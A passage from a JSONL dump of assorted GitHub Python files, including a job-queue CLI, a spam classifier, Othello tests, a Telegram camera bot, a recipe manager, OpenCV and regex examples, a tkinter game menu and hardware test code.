open('./dataset/dataset_interpolation/predictors.pkl','wb'))\n","repo_name":"2hyes/CLI-development","sub_path":"getTrainTestSet/getTrainTestSet_interpolation.py","file_name":"getTrainTestSet_interpolation.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"35494544623","text":"import logging.config\n\nimport click\n\nfrom .version import VERSION\nfrom .worker import RunWorkerProcess, import_string\n\nburst_help = 'Batch mode: exit once no jobs are found in any queue.'\nhealth_check_help = 'Health Check: run a health check and exit'\nverbose_help = 'Enable verbose output.'\n\n\n@click.command()\n@click.version_option(VERSION, '-V', '--version', prog_name='arq')\n@click.argument('worker-path', type=click.Path(exists=True, dir_okay=False, file_okay=True), required=True)\n@click.argument('worker-class', default='Worker')\n@click.option('--burst/--no-burst', default=False, help=burst_help)\n@click.option('--check', is_flag=True, help=health_check_help)\n@click.option('-v', '--verbose', is_flag=True, help=verbose_help)\ndef cli(*, worker_path, worker_class, burst, check, verbose):\n \"\"\"\n Job queues in python with asyncio, redis and msgpack.\n\n CLI to run the arq worker.\n \"\"\"\n worker = import_string(worker_path, worker_class)\n logging.config.dictConfig(worker.logging_config(verbose))\n\n if check:\n exit(worker.check_health())\n else:\n RunWorkerProcess(worker_path, worker_class, burst)\n","repo_name":"justlittle/arq","sub_path":"arq/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"54255874396","text":"# import sys\n# sys.path.append('.')\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import svm\nimport psycopg2\ndef spam(review):\n df1 = pd.read_csv(\"machine/Sigma-Channel1.csv\")\n df2 = pd.read_csv(\"machine/Sigma-Channel2.csv\")\n df3 = pd.read_csv(\"machine/Sigma-Channel3.csv\")\n df4 = pd.read_csv(\"machine/Sigma-Channel4.csv\")\n df5 = pd.read_csv(\"machine/Sigma-Channel5.csv\")\n\n frames = [df1, df2, df3, df4, df5]\n # create a single data frame\n df_merged = pd.concat(frames)\n\n # assigning keys to allow model know the respective database\n keys = 
[\"Channel1\",\"Channel2\",\"Channel3\",\"Channel4\",\"Channel5\"]\n df_with_keys = pd.concat(frames,keys=keys)\n\n df = df_with_keys\n # extracting columns from database\n df_data = df[[\"CONTENT\",\"CLASS\"]]\n\n df_x = df_data['CONTENT']\n df_y = df_data['CLASS']\n\n corpus = df_x\n # raw texts are converted to vector numeric values. Preparing to fit in\n # machine learning model\n cv = CountVectorizer()\n X = cv.fit_transform(corpus)\n # Algorithm will use 70% of data for training model, 30% will be used for model testing.\n X_train, X_test, y_train, y_test = train_test_split(X, df_y, test_size=0.30, random_state=42)\n # Naive Bayes algorithm to train the spam model\n clf = MultinomialNB()\n # fitting model into dataset to identify pattterns and insights of the dataset\n clf.fit(X_train,y_train)\n\n comment = [\"{}\".format(review)]\n test_score = clf.score(X_train, y_train) * 100\n print(f\"Accuracy = {test_score:.2f}%\")\n # converting result into array\n vect = cv.transform(comment).toarray()\n result = clf.predict(vect)\n\n if (result[0] == 1):\n return True\n\n return False\n","repo_name":"AiXueK/Movie-Search-Web","sub_path":"project/backend/machine/spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2904987683","text":"from board import Board\nfrom human_control import HumanControl\n\n\ndef test_board_check():\n # initialize 5 * 5 board to test\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n hc1.board_check()\n # check the valid positions\n valid1 = (0, 0)\n valid2 = (1, 3)\n assert valid1 in hc1.vaild_positions\n assert valid2 in hc1.vaild_positions\n\n\ndef test_line_check():\n # still use board1 to check\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n # pick a valid cell to test\n col = 1\n row = 3\n # check the valid line: upper right\n xadd = 1\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # check an invaild line: up\n xadd = 0\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # pick an invalid cell to test\n col = 3\n row = 2\n for xadd in hc1.ADD:\n for yadd in hc1.ADD:\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(1, 3)]\n","repo_name":"LinzheHE/Othello_Game","sub_path":"human_control_test.py","file_name":"human_control_test.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73541241928","text":"class LoadTraceInstruction(object):\n \"\"\"Track load trace instruction in an orderly manner.\"\"\"\n def __init__(self, line):\n tokens = line.split(', ')\n self.uiid = int(tokens[0])\n self.cycle = int(tokens[1])\n self.addr = int(tokens[2], 16)\n self.pc = int(tokens[3], 16)\n self.is_hit = bool(tokens[4])\n\n # List of (pc, dec) tuples, from most recent to least recent.\n #print(tokens[5:])\n self.branches = [(int(tokens[i], 16), bool(int(tokens[i + 1]))) for i in range(5, len(tokens), 2)]\n\n def __str__(self):\n s = 
f'uiid={self.uiid} cycle={self.cycle} pc={hex(self.pc)} addr={hex(self.addr)} is_hit={self.is_hit} branches=['\n for pc, dec in self.branches:\n if pc == 0 and not dec:\n continue\n s += f'(pc={hex(pc)} dec={\"T\" if dec else \"NT\"})'\n s += ']'\n return s\n\n\ndef get_instructions(f):\n \"\"\"Process the load trace as a generator, (note the yield)\n yielding every loaded data address.\n Can call using gather_correlation_data inside an\n open (or variant) context.\"\"\"\n for line in f:\n # For handling some invalid lines in the ML-DPC load traces\n if line.startswith('***') or line.startswith('Read'):\n continue\n yield LoadTraceInstruction(line)\n","repo_name":"cmolder/voyager-analysis","sub_path":"utils/load_trace.py","file_name":"load_trace.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73101577928","text":"import dataset\r\n\r\nasync def get_data(players: list, table_players: dataset.Table, lobby: dict) -> dict:\r\n data = {}\r\n questions = []\r\n for i in range(len(players)):\r\n player_db = table_players.find_one(user=players[i], game=lobby.get(\"code\"))\r\n questions.append(list(player_db.get(\"data\")))\r\n \r\n questions = [elem[0] for elem in questions]\r\n\r\n for question in questions:\r\n answers = {}\r\n for player in players:\r\n try:\r\n answers[player] = table_players.find_one(user=player).get(\"data\")[question]\r\n except KeyError:...\r\n data[question] = answers\r\n \r\n return data\r\n\r\n","repo_name":"belkinark/NotipBox","sub_path":"utils/text2player.py","file_name":"text2player.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21435582614","text":"# -*- coding: utf-8 -*-\n\nimport telebot\nimport datetime\nimport os\nfrom picamera import PiCamera\nfrom homie import settings\nfrom homie.utils import *\nfrom homie.security import *\nfrom homie.classes import *\n\nbot = telebot.TeleBot(settings.API_TOKEN)\ncamera = PiCamera()\n\n\n@bot.message_handler(commands=['enviarvideo'])\ndef send_video(message):\n \"\"\"\n Captures a new video, saves it and sends it\n \"\"\"\n filename = '{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.VIDEO_EXTENSION\n )\n bot.send_message(message.chat.id, 'Grabando vídeo, esto puede llevar unos minutos...')\n camera.start_recording(filename)\n camera.wait_recording(settings.MAX_VIDEO_TIME)\n camera.stop_recording()\n bot.send_message(message.chat.id, 'Vídeo grabado, enviando...')\n bot.send_video(message.chat.id, open(filename, 'rb'))\n\n \n@bot.message_handler(commands=['enviarfoto'])\ndef send_photo(message):\n \"\"\"\n Captures a new image, saves it and sends it\n \"\"\"\n filename ='{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.IMAGE_EXTENSION\n )\n bot.send_message(message.chat.id, 'Enviando foto...')\n camera.capture(filename)\n bot.send_photo(message.chat.id, open(filename, 'rb'))\n log = ('Foto ' + filename + ' guardada por ' + message.chat.first_name + ' ' \n + message.chat.last_name + ' [' + str(message.chat.id) + ']')\n print(log)\n\n\n \ndef initialize():\n camera.rotation = settings.ROTATION.value\n camera.resolution = (\n settings.RESOLUTION.value['height'], \n settings.RESOLUTION.value['width']\n )\n\n\nif __name__ == '__main__':\n initialize()\n print('Bot listening!')\n 
bot.polling()\n","repo_name":"pablo-moreno/homie-legacy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37854425228","text":"from Entidades.receita import Receita\nfrom Telas.tela_receita import TelaReceita\nfrom Telas.tela_receita_acoes import TelaReceitaAcoes\nfrom Telas.tela_receita_view import TelaReceitaView\nfrom Telas.tela_receita_relatorio import TelaReceitaRelatorio\nfrom Entidades.ingrediente_receita import IngredienteReceita\nfrom DAOs.receita_dao import ReceitaDAO\nfrom DAOs.relatorio_dao import RelatorioDAO\nfrom Excecoes.empty_list_exception import EmptyListException\nfrom datetime import date\n\n\nclass ControladorReceita:\n def __init__(self, controlador_sistema):\n self.__controlador_sistema = controlador_sistema\n self.__controlador_ingrediente = self.__controlador_sistema.dao_ingrediente\n self.__dao = ReceitaDAO()\n self.__dao_relatorio = RelatorioDAO()\n self.__tela_receitas = TelaReceita()\n self.__tela_receitas_acoes = TelaReceitaAcoes()\n self.__tela_receita_view = TelaReceitaView()\n self.__tela_receita_relatorio = TelaReceitaRelatorio()\n self.__eventos_receita = []\n\n def abre_tela(self):\n lista_opcoes = {'cadastro': self.cadastrar_receita,\n 'alteracao': self.alterar_receita,\n 'view': self.visualizar_receita,\n 'relatorio': self.ver_relatorio_receita,\n 'exclusao': self.excluir_receita,\n 'retorna': self.retornar_menu_principal}\n\n while True:\n opcao_menu, valor_menu = self.__tela_receitas.abre_tela(self.__dao.get_all_names())\n self.__tela_receitas.fecha_tela()\n if opcao_menu is None:\n exit(0)\n\n if opcao_menu == 'alteracao' or opcao_menu == 'exclusao' or opcao_menu == 'view':\n lista_opcoes[opcao_menu](valor_menu['cb_opcao'])\n else:\n lista_opcoes[opcao_menu]()\n\n def cadastrar_receita(self):\n ingredientes_estoque = self.lista_ingredientes_menu()\n infos_tela = None\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n\n if dados_receita is None:\n self.cadastrar_receita()\n\n ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n\n nova_receita = Receita(dados_receita[\"titulo\"], ingredientes_receita, dados_receita[\"preparo\"])\n\n if nova_receita in self.__dao.get_all():\n self.__tela_receitas.erro_ja_cadastrado(nova_receita.titulo)\n self.abre_tela()\n self.__dao.add(nova_receita.titulo, nova_receita)\n self.registra_evento(\"Cadastro de receita\", nova_receita.titulo)\n\n def alterar_receita(self, titulo):\n ingredientes_estoque = self.lista_ingredientes_menu()\n receita_alterada = self.__dao.get(titulo)\n\n if receita_alterada is None:\n self.abre_tela()\n\n infos_tela = {'titulo': receita_alterada.titulo,\n 'preparo': receita_alterada.preparo,\n 'ingredientes': receita_alterada.ingredientes_receita}\n\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n else:\n if dados_receita is None:\n self.alterar_receita(titulo)\n\n self.__dao.remove(receita_alterada.titulo)\n receita_alterada.titulo = dados_receita[\"titulo\"]\n receita_alterada.ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n receita_alterada.preparo = dados_receita[\"preparo\"]\n self.__dao.add(receita_alterada.titulo, receita_alterada)\n\n self.registra_evento(\"Alteração 
de receita\", receita_alterada.titulo)\n self.abre_tela()\n\n def visualizar_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n if receita is None:\n self.abre_tela()\n\n ingredientes = ''\n for i in receita.ingredientes_receita:\n ingredientes += str(i.nome) + ' - ' + str(i.quantidade) + ' ' + str(i.unidade_medida) + '\\n'\n titulo = receita.titulo\n preparo = receita.preparo\n\n button_value = self.__tela_receita_view.abre_tela(titulo, ingredientes, preparo)\n self.registra_evento(\"Pesquisa de receita\", receita.titulo)\n if button_value is None:\n exit(0)\n elif button_value == 'retornar':\n self.abre_tela()\n else:\n self.fazer_receita(titulo)\n\n def fazer_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n for i in receita.ingredientes_receita:\n ingrediente_estoque = self.__controlador_ingrediente.get(i.nome)\n if ingrediente_estoque.quantidade < i.quantidade:\n self.__tela_receita_view.erro_ingredientes_insuficientes(i.nome)\n self.abre_tela()\n\n for i in receita.ingredientes_receita:\n ingrediente_deduzir = self.__controlador_ingrediente.get(i.nome)\n ingrediente_deduzir.quantidade -= i.quantidade\n self.__controlador_ingrediente.add(ingrediente_deduzir.nome, ingrediente_deduzir)\n self.__tela_receitas.feedback_sucesso()\n\n self.registra_evento(\"Receita feita\", titulo)\n\n def ver_relatorio_receita(self):\n try:\n if not self.__dao_relatorio.get():\n raise EmptyListException()\n\n relatorio = ''\n for i in self.__dao_relatorio.get():\n relatorio += i + '\\n'\n self.__tela_receita_relatorio.abre_tela(relatorio)\n\n except EmptyListException:\n self.abre_tela()\n\n def excluir_receita(self, titulo):\n valor = self.__dao.remove(titulo)\n if valor == 'exception':\n self.abre_tela()\n self.__tela_receitas_acoes.feedback_sucesso()\n self.registra_evento(\"Exclusão de receita\", titulo)\n\n # ------ MÉTODOS INTERNOS ------\n\n def registra_evento(self, acao, receita):\n registro = ''\n registro += 'Ação: ' + acao + \" - Receita: \" + receita + \" - Data: \" + str(date.today())\n self.__dao_relatorio.add(registro)\n\n def criar_lista_ingredientes(self, dados_ingredientes: dict):\n ingredientes_receita = []\n for nome_ingrediente in dados_ingredientes:\n if nome_ingrediente != '':\n add_ingrediente = IngredienteReceita(self.__controlador_ingrediente.get(nome_ingrediente),\n dados_ingredientes[nome_ingrediente])\n ingredientes_receita.append(add_ingrediente)\n return ingredientes_receita\n\n def lista_ingredientes_menu(self):\n lista_ingredientes = self.__controlador_ingrediente.get_all()\n lista_menu = []\n for i in lista_ingredientes:\n ing = i.nome + ', [{}]'.format(i.unidade_medida)\n lista_menu.append(ing)\n return lista_menu\n\n def retornar_menu_principal(self):\n self.__controlador_sistema.abre_tela()\n","repo_name":"paulazomig/sistema-de-receitas","sub_path":"Controladores/controlador_receita.py","file_name":"controlador_receita.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11534512965","text":"\"\"\"Transformations to make to a given column's raw data.\"\"\"\nfrom datetime import datetime\n\ndef convert_utc_timestamp_to_datetime_string(utc_time: float) -> str:\n \"\"\"Given a UTC timestamp, convert to a human-readable date string.\n \n >>> convert_utc_timestamp_to_datetime_string(1679147878.0)\n Sunday, March 19, 2023, at 8:11:18 PM \n \"\"\"\n utc_datetime = datetime.fromtimestamp(utc_time)\n return utc_datetime.strftime(\"%A, %B %d, %Y, at 
%I:%M:%S %p\")\n\nMAP_COL_TO_TRANSFORMATION = {\n \"created_utc_string\": {\n \"original_col\": \"created_utc\",\n \"transform_func\": convert_utc_timestamp_to_datetime_string\n }\n}\n\nTRANSFORMATION_FIELDS_LIST = [\"created_utc_string\"]\n","repo_name":"mark-torres10/redditResearch","sub_path":"src/ml/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38777342707","text":"import sys\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n# function\ndef cut(row, col, size):\n\t'''\n\tpaper[row][col]부터 시작하는 size*size 크기의 종이를 확인.\n\t모두 같은 수면 cnt 배열을 업데이트하고\n\t아니면 9등분해서 재귀함.\n\t'''\n\tisAll1 = isAll0 = isAllM1 = True\n\tfor r in range(row, row + size):\n\t\tfor c in range(col, col + size):\n\t\t\tif paper[r][c] == 0: isAll1 = isAllM1 = False\n\t\t\telif paper[r][c] == 1: isAllM1 = isAll0 = False\n\t\t\telse: isAll1 = isAll0 = False\n\t\tif not isAll1 and not isAll0 and not isAllM1: break\n\t\n\tif isAllM1: cnt[0] += 1\n\telif isAll0: cnt[1] += 1\n\telif isAll1: cnt[2] += 1\n\telse:\n\t\tsize //= 3\n\t\tfor i in range(3):\n\t\t\tfor j in range(3):\n\t\t\t\tcut(row + i * size, col + j * size, size)\n\n# input\nn = int(input())\npaper = [tuple(map(int, input().split())) for _ in range(n)]\n# process & output\ncnt = [0, 0, 0]\ncut(0, 0, n)\nprint(*cnt)","repo_name":"WaiNaat/TWS","sub_path":"QKIM/Acmicpc/A01780.py","file_name":"A01780.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"21529243029","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread(r'C:\\Users\\indra094\\Documents\\scripts\\ResultImages\\veins1.jpeg')\nimggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, thresh = cv2.threshold(imggray, 127, 255, 0)\nkernel = np.ones((2,2), np.uint8)\n\n#dilation = cv2.dilate(thresh, kernel, iterations=1)\nerosion = cv2.erode(thresh, kernel, iterations=5)\ndilation = cv2.dilate(erosion, kernel, iterations=5)\n\n \n# Find Canny edges\nedges = cv2.Canny(dilation, 30, 200)\n\ncontours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\ni=0\nfor cnt in contours:\n epsilon = 0.1*cv2.arcLength(cnt,True)\n approx = cv2.approxPolyDP(cnt,epsilon,True)\n #cv2.imshow(\"orig2\"+str(i), approx)\n print (cv2.arcLength(cnt,True))\n print (cv2.contourArea(cnt))\n i +=1\n#COUNTOURS vector of x,y - boundary points\n\nprint (len(contours))\n#print (contours[1])\n\ncv2.drawContours(dilation, contours, -1, (0, 255, 0), 1)\n\ncv2.imshow(\"orig\", dilation)\ncv2.imshow(\"eroded\", edges)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"indra094/PythonStuffPlusOpenCV","sub_path":"Countours.py","file_name":"Countours.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"33711392231","text":"from flask.json import JSONEncoder\nfrom meddit.post import Post\n\nclass PostsJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Post):\n return {\n 'id': obj.id,\n 'author': obj.author,\n 'gif_id': obj.gif_id,\n 'created': obj.created,\n 'votes': obj.votes,\n }\n return 
super().default(obj)\n","repo_name":"mking/meddit","sub_path":"meddit/posts_json_encoder.py","file_name":"posts_json_encoder.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1217534545","text":"import re\n\n# 同时提取 月 日\nregex = r\"^([a-zA-Z]+) (\\d+)$\" # 必须使用 raw string\nif re.search(regex, \"June 24\"):\n match = re.search(regex, \"June 24\")\n\n print(\"Match at index %s, %s\" % (match.start(), match.end()))\n\n # match.group(0),match.group() 全部提取信息\n # match.group(1), match.group(2), ... 从左到右返回提取信息\n print(\"Full match: %s\" % (match.group(0)))\n print(\"Month: %s\" % (match.group(1)))\n print(\"Day: %s\" % (match.group(2)))\nelse:\n print(\"The regex pattern does not match. :(\")\n\nregex = r\"^[a-zA-Z]+ \\d+$\"\n# 找出所有匹配信息\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Full match: %s\" % (match))\n\n# 提取月\nregex = r\"([a-zA-Z]+) \\d+\"\nmatches = re.findall(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match month: %s\" % (match))\n\nregex = r\"([a-zA-Z]+) \\d+\"\n# 返回匹配的开始 结束位置\nmatches = re.finditer(regex, \"June 24, August 9, Dec 12\")\nfor match in matches:\n print(\"Match at index: %s, %s\" % (match.start(), match.end()))\n\nregex = r\"([a-zA-Z]+) (\\d+)\"\nregex1 = r\"\\2 of \\1\"\n\n# 替换提取到的信息为新的模式\nprint(re.sub(regex, regex1, \"June 24, August 9, Dec 12\"))\n\nregex = re.compile(r\"(\\w+) World\")\nresult = regex.search(\"Hello World is the easiest\")\nif result:\n print(result.start(), result.end())\n\nfor result in regex.findall(\"Hello World, Bonjour World\"):\n print(result)\n\nprint(regex.sub(r\"\\1 Earth\", \"Hello World\"))\n","repo_name":"AutuanLiu/Fastai-Notes-V3","sub_path":"src/Regular_expressions.py","file_name":"Regular_expressions.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"42345076261","text":"import os\nimport unittest\nfrom pyats.topology import loader\nfrom genie.libs.sdk.apis.linux.snmp.get import get_snmp_snmpwalk_v3\n\n\nclass TestGetSnmpSnmpwalkV3(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n testbed = f\"\"\"\n devices:\n morph-full2:\n connections:\n defaults:\n class: unicon.Unicon\n a:\n command: mock_device_cli --os linux --mock_data_dir {os.path.dirname(__file__)}/mock_data --state connect\n protocol: unknown\n os: linux\n platform: linux\n type: linux\n \"\"\"\n self.testbed = loader.load(testbed)\n self.device = self.testbed.devices['morph-full2']\n self.device.connect(\n learn_hostname=True,\n init_config_commands=[],\n init_exec_commands=[]\n )\n\n def test_get_snmp_snmpwalk_v3(self):\n result = get_snmp_snmpwalk_v3(self.device, '172.20.249.11', '1.3.6.1.4.1.9.9.25.1.1.1.2', 'TestUsr2', 'password1', 'authPriv', 'md5', 'des', 'password', '3', None)\n expected_output = 'snmpget: Unknown user name'\n self.assertEqual(result, expected_output)\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/tests/linux/snmp/get/get_snmp_snmpwalk_v3/test_api_get_snmp_snmpwalk_v3.py","file_name":"test_api_get_snmp_snmpwalk_v3.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"} +{"seq_id":"5111478825","text":"import tkinter as tk\nfrom random import randrange\n\n# Create tk instance\nhome_page = tk.Tk()\n\n# Window 
title\nhome_page.title(\"Minigames by Victor Nestor\")\n\n# Disable resizing\nhome_page.resizable(False, False)\n\n# Window sizing and position\nwindow_height = 500\nwindow_width = 500\nscreen_height = home_page.winfo_screenheight()\nscreen_width = home_page.winfo_screenwidth()\ny_coordinate = int((screen_height/2) - (window_height/2))\nx_coordinate = int((screen_width/2) - (window_width/2))\n\n# Set the dimensions and position of window.\nhome_page.geometry(\"{}x{}+{}+{}\".format(window_width,\n window_height, x_coordinate, y_coordinate))\n\n# Grid geometry\n# home_page.grid_rowconfigure(0, weight=1)\n# home_page.grid_rowconfigure(1, weight=1)\n# home_page.grid_rowconfigure(2, weight=1)\n# home_page.grid_rowconfigure(3, weight=1)\n# home_page.grid_rowconfigure(4, weight=1)\n# home_page.grid_rowconfigure(5, weight=1)\n# home_page.grid_rowconfigure(6, weight=1)\n# home_page.grid_rowconfigure(7, weight=1)\n# home_page.grid_rowconfigure(8, weight=1)\n# home_page.grid_rowconfigure(9, weight=1)\n# home_page.grid_rowconfigure(10, weight=1)\nfor num in range(0, 8):\n # Create 8 rows\n home_page.grid_rowconfigure(num, weight=1)\n\n# home_page.grid_columnconfigure(0, weight=1)\n# home_page.grid_columnconfigure(1, weight=1)\n# home_page.grid_columnconfigure(2, weight=1)\n# home_page.grid_columnconfigure(3, weight=1)\n# home_page.grid_columnconfigure(4, weight=1)\n\nfor num in range(0, 5):\n # Create 5 columns\n home_page.grid_columnconfigure(num, weight=1)\n\n# Create labels\nhome_label = tk.Label(home_page, text=\"Python Minigames!\", font=(30))\nfirst_line_break = tk.Label(\n home_page, text=\"*\" * 75)\ngame_label = tk.Label(home_page, text=\"Pick A Game\", font=(20))\nchosen_label = tk.Label(home_page, text=\"Game chosen: \\n\\nNone\", font=(20))\nsecond_line_break = tk.Label(\n home_page, text=\"*\" * 75)\nthird_line_break = tk.Label(\n home_page, text=\"*\" * 75)\n\n# Create buttons\n\n# List of games\ngame_buttons = []\ntic_tac_toe_button = tk.Button(\n home_page, text=\"Tic-Tac-Toe\", command=lambda: set_game(1))\ngame_buttons.append(tic_tac_toe_button)\nrock_paper_scissors_button = tk.Button(\n home_page, text=\"Rock, Paper, Scissors\", command=lambda: set_game(2))\ngame_buttons.append(rock_paper_scissors_button)\nguess_the_number_button = tk.Button(\n home_page, text=\"Guess The Number\", command=lambda: set_game(3))\ngame_buttons.append(guess_the_number_button)\nsnake_game_button = tk.Button(\n home_page, text=\"Snake Game\", command=lambda: set_game(4))\ngame_buttons.append(snake_game_button)\n\n# Start game list\nstart_game_list = []\nstart_game_button = tk.Button(home_page, text=\"Start Game\")\nstart_game_list.append(start_game_button)\n\n\n# Append labels and buttons to home page\nhome_label.grid(row=0, column=0, columnspan=5)\nfirst_line_break.grid(row=1, column=0, columnspan=5)\ngame_label.grid(row=2, column=0, columnspan=5)\nsecond_line_break.grid(row=4, column=0, columnspan=5)\nchosen_label.grid(row=5, column=0, columnspan=5)\nthird_line_break.grid(row=6, column=0, columnspan=5)\n\n# Append game buttons\nfor row in range(0, 1):\n for col in range(0, 4):\n i = row * 4 + col\n game_buttons[i].grid(row=row+3, column=col+1)\n\nstart_game_list[0].grid(row=7, column=0, columnspan=5)\n\n\n# Setup for selected game\n\n# 0 for none selected\ngame_selected = 0\n\nprint(game_selected)\n\n# Reset all variables\n\n\ndef init():\n global game_buttons, mode_buttons, game_selected, chosen_label\n game_selected = 0\n chosen_label[\"text\"] = \"Game chosen: \\n\\nNone\"\n\n\ndef set_game(i):\n 
global game_buttons, mode_buttons, game_selected\n print(i)\n game_selected = i\n # Check which game is selected\n if game_selected == 1:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nTic-Tac-Toe\"\n elif game_selected == 2:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nRock, Paper, Scissors\"\n elif game_selected == 3:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nGuess The Number\"\n elif game_selected == 4:\n chosen_label[\"text\"] = \"Game chosen: \\n\\nSnake Game\"\n\n\ndef start_game(i):\n global game_selected\n\n\n# Mainloop keeps the program running until closed by the user.\nhome_page.mainloop()\n","repo_name":"VNestor/python-minigames","sub_path":"home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":4235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70171914250","text":"def createDataBase(db):\n cursor = db.cursor()\n cursor.execute('CREATE TABLE IF NOT EXISTS scores(bestScores)')\n\ndef insertNewHighScore(db, points):\n cursor = db.cursor()\n bestScore = returnBestScore(db)\n\n if points > bestScore:\n cursor.execute(f'INSERT INTO scores VALUES({points})')\n db.commit()\n\ndef returnBestScore(db):\n cursor = db.cursor()\n result = cursor.execute('SELECT bestScores FROM scores')\n\n bestScore = 0\n for row in result.fetchall():\n if row[0] > bestScore:\n bestScore = row[0]\n\n return bestScore\n","repo_name":"flipe27/flappy-bird","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74870835207","text":"import os\nimport sys\nimport serial\nimport threading\nimport struct\nimport time\nimport traceback\n\nfrom AutoGrader.devices import HardwareBase\n\n\nclass STM32(HardwareBase):\n CMD_RESET_DUT = 'U'\n CMD_RESET_TESTER = 'R'\n CMD_ENABLE_ANALOG = 'O'\n CMD_TERMINATE = 'E'\n \n START_DELIM = b'S'\n STOP_DELIM = b'E'\n TOTAL_PKT_LEN = 9\n\n # parameters\n baud_rate = 460800\n usb_path = None\n input_waveform_path = None\n output_waveform_path = None\n\n # device info\n name = None\n config = None\n\n # parent\n hardware_engine = None\n\n # serial\n dev = None\n\n # files\n fin = None\n output_metadata = None\n\n # thread status\n uart_reading_thread = None\n alive = True\n\n # execution\n execution_start_time = None\n\n def __init__(self, name, config, hardware_engine, file_folder):\n \n if 'baud' in config:\n self.baud_rate = config['baud']\n\n if \"usb_path\" not in config:\n raise Exception('\"usb_path\" field is required')\n self.usb_path = config['usb_path']\n\n if 'input_waveform_file' not in config:\n raise Exception('\"input_waveform_file\" field is required')\n self.input_waveform_path = os.path.join(file_folder, config['input_waveform_file'])\n\n if 'output_waveform_file' in config and config['output_waveform_file']:\n self.output_waveform_path = os.path.join(file_folder, config['output_waveform_file'])\n else:\n self.output_waveform_path = '/dev/null'\n\n if 'output_metadata' not in config:\n raise Exception('\"output_metadata\" field is required')\n self.output_metadata = config['output_metadata']\n\n self.name = name\n self.config = config\n self.hardware_engine = hardware_engine\n\n def 